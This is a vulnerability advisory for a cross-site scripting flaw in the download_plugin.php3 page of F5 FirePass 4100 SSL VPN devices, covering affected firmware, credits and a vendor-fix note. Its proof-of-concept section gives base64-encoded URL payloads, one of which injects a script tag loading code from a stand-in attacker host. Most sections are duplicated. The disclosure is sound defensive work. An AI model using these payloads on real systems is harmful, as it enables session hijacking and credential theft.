F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
BID:26412
Info
F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
| Bugtraq ID: | 26412 |
| Class: | Input Validation Error |
| CVE: |
CVE-2007-5979 |
| Remote: | Yes |
| Local: | No |
| Published: | Nov 12 2007 12:00AM |
| Updated: | Nov 22 2007 10:44PM |
| Credit: | Jan Fry <[email protected]> and Adrian Pastor <[email protected]> of Procheckup Ltd are credited with the discovery of this vulnerability. |
| Vulnerable: |
F5 FirePass 4100 5.4.2 F5 FirePass 4100 0 F5 FirePass 6.0.1 F5 FirePass 5.5.2 F5 FirePass 6.0 F5 FirePass 5.4 F5 FirePass |
| Not Vulnerable: | |
Discussion
F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4 through 5.5.2
6.0
6.0.1
F5 FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker to steal cookie-based authentication credentials and to launch other attacks.
F5 FirePass 4100 SSL VPNs running these firmware versions are vulnerable:
5.4 through 5.5.2
6.0
6.0.1
Exploit / POC
F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs demonstrate this issue:
https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i
Attackers can exploit this issue via a browser.
The following example URIs demonstrate this issue:
https://www.example.com/download_plugin.php3?js=&backurl=Ij48c2NyaXB0IHNyYz0iaHR0cDovL3d3dy5ldmlsLmZvby94c3MiPjwvc2NyaXB0PjxhIGhyZWY9Ig==
https://www.example.com/download_plugin.php3?js=&backurl=Ij48dGV4dGFyZWE+SFRNTCBpbmplY3Rpb24gdGVzdDwvdGV4dGFyZWE+PGEgaHJlZj0i
Solution / Fix
F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
Solution:
The vendor has issued a support document regarding this issue. Users of affected devices should contact the vendor for information on the availability of fixes.
Solution:
The vendor has issued a support document regarding this issue. Users of affected devices should contact the vendor for information on the availability of fixes.
References
F5 FirePass 4100 SSL VPN Download_Plugin.PHP3 Cross-Site Scripting Vulnerability
References:
References: